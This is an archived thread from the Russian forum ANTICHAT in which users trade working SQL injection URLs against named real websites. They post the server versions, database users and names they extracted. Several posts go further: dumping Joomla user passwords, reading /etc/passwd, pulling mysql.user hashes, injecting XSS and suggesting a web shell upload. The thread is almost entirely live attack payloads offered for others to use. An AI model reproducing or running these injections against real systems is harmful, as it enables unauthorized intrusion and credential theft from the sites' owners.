ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.06.2010, 22:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
http://ipsnorthamerica.net/news.php?idnews=2694+and+1=0+union+select+1,2,3,4, concat_ws(char(32,58,32),user(),version(),database (),@@version_compile_os),6,7,8,9,10,11,12,13,14,15
PR-6
|
|
|

21.06.2010, 00:50
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме: 1777031
Репутация:
256
|
|
Код:
Code:
http://swc.com.ua/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,12,3,4+--+
Version: 4.1.22-standard-log
Database: student_SWC
User: student_user@localhost
PR - 1
ТИЦ - 10
Вот юзеры:
Код:
Code:
http://swc.com.ua/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x3a,password%29,2,3,4+from+jos_users--
Только в админку доступа нет, идет редирект на морду.
|
|
|

21.06.2010, 02:20
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
Код:
Code:
http://www.crie.min-edu.pt/index.php?section=162-999.9+union+select+1,2,3,4,5,6,7,8,concat_ws(user(),version(),database()),10,11,12,13,14--
PR 7
вывод сверху
version - 4.1.22
user - mde@localhost
database - mde
Код:
Code:
http://www.hbtheusden.nl/Content/base.php?ID=10-999.9+union+select+1,2,concat_ws(user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
PR 4
вывод тоже сверху
version - 5.0.67
user - hbvt_hbvt@localhost
database - hbvt_Hbt
P.S. Мой первый скуль в паблике и надеюсь не байанный и не последний...
|
|
|

21.06.2010, 03:15
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 4
Провел на форуме: 188246
Репутация:
1
|
|
PR 5
Код:
Code:
http://www.readingmatters.co.uk/book2.php?id=-235+union+select+1,concat_ws%280x3a,version%28%29,database%20%28%29,user%28%29%29,3,4,5,6,7,8,9%20--
version : 5.0.67-community-log
database : readingmatters
user: davidmarshall@localhost
|
|
|

21.06.2010, 03:26
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме: 736224
Репутация:
388
|
|
pechory.library.ru
PR - 8
ТиЦ - 5400
MySQL 4.1.20
LOAD FILE:
Код:
Code:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10+from+mysql.user+--
с ковычками проблем нет)
---------------------------------------------------------
Sql Inj XSS:
Код:
Code:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,2,3,4,5,'alert();',7,8,9,10+from+mysql.user+--
---------------------------------------------------------
all:
Код:
Code:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,2,3,4,5,6,group_concat(0x0b,user,0x3a,password,0x3a,host,0x3a,file_priv),8,9,concat_ws(0x3a,@@version_compile_os,0x3a,user(),0x3a,version(),0x3a,database())+from+mysql.user+--
Вам осталось только раскрыть пути и залить шелл =)
|
|
|

21.06.2010, 14:31
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
Провел на форуме: 67426
Репутация:
0
|
|
http://www.adaderana.lk/show.php?prid=-4+UNION+SELECT+concat_ws(user(),version(),database ())--
вывод в названии картинки
PR4
http://www.anca.org/press_releases/press_releases.php?prid=-999.9+UNION+SELECT+1,concat_ws(user(),version(),da tabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
тиц 50 pr 6
|
|
|

21.06.2010, 14:48
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
Провел на форуме: 67426
Репутация:
0
|
|
http://www.mordauntshort.com/press_releases.php?PRID=7
7 AND %тут выражение%
Current DB: mordauntshort2007
Tables: ms_admin
id: 1
username: ChrisSoutham
password:
ТИЦ70(R3) PR4
|
|
|

21.06.2010, 15:49
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
Сборочка
accordsalud.com.ar pr 3
Код:
Code:
http://www.accordsalud.com.ar/php/turismo/destinos/alojamientos.php?id=34-999.9+union+select+1,2,concat_ws(user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
version - 5.1.3.8-community
user - up@localhost
database - accord_salud
vvaltena.nl тиц 10 pr 2
Код:
Code:
http://www.vvaltena.nl/default.php?id=47-999.9+union+select+1,concat_ws(user(),version(),database()),3--
version - 5.1.47
user - vvaltena@net3-nl-iis-94.ad.vevida.net
database - vvaltena
newmexicocreates.org pr 5
Код:
Code:
http://newmexicocreates.org/artists.php?id=1146-999.9+union+select+1,2,3,concat_ws(user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
version - 4.1.22
user - mnmadmin@que.newmex.com
database - mnmfdb
pustin2000.ru pr 2
Код:
Code:
http://www.pustin2000.ru/material.php?id=7-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9--
version - 4.1.25
user - pustin20@localhost
database - wwwpustin2000ru
polymery.ru тиц 60 pr 4
Код:
Code:
http://www.polymery.ru/material.php?id=3-999.9+union+select+1,concat_ws(user(),version(),database()),3--
version - 5.0.88
user - u44790@10.8.2.20
database - u44790
worldmusicinstitute.org тиц 10 pr 4
Код:
Code:
http://www.worldmusicinstitute.org/event.php?id=906-999.9+union+select+1,2,3,4,5,6,7,8,concat_ws(user(),version(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74--
version - 4.1.25-Debian_mt1-log
user - worldmusicinst@64.13.192.29
database - worldmusicinstitute_org_-_ucms
klimt02.net pr 5
Код:
Code:
http://www.klimt02.net/jewellers/index.php?item_id=11203-999.9+union+select+1,2,3,4,5,6,concat_ws(user(),version(),database()),8--
version - 5.0.67-community
user - klimt03_01@localhost
database - klimt03_01
thermos-russia.ru 20 тиц , pr 2
Код:
Code:
http://www.thermos-russia.ru/showimg.php?id=68-999.9+union+select+1,2,3,4,5,6,7,concat_ws(user(),version(),database()),9,10,11,12--
version - 4.0.26
user - thermo@aqua.di-net.ru
database - thermo
futureevents.ru тиц 20
Код:
Code:
http://www.futureevents.ru/event.php?id=86-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7--
version - 5.0.45-community
user - ntsison@localhost
database - sison
cosplay.compgamer.com pr 3
Код:
Code:
http://cosplay.compgamer.com/readnews.php?id=4848-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--
version - 5.0.45-log
user - compgamer_com@localhost
database - compgamer_com_2
P.S. Всё тщательно проверял на бойанность,но если где-то пропустил,извиняйте!
|
|
|

21.06.2010, 20:30
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
http://www.wordsfromreuben.com/2009/songs.php?rid=17+union+select+1,2,concat_ws(0x3a,u ser(),version(),database(),@@version_compile_os),4 ,5,6,7
PR-4
|
|
|

21.06.2010, 20:45
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме: 247684
Репутация:
136
|
|
РЕЧФЛОТ
http://www.rechflot.ru/page/static.php?pn=-21+and+1=2+union+select+1,2,concat_ws(0x3a,version (),user(),database(),@@version_compile_os),4+--
version : 5.0.67-log
user : h2rechf_mainuser@www5.100mb.ru
database : :h2rechf_rechflot
os : portbld-freebsd6.2
таблица users
/admin/...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|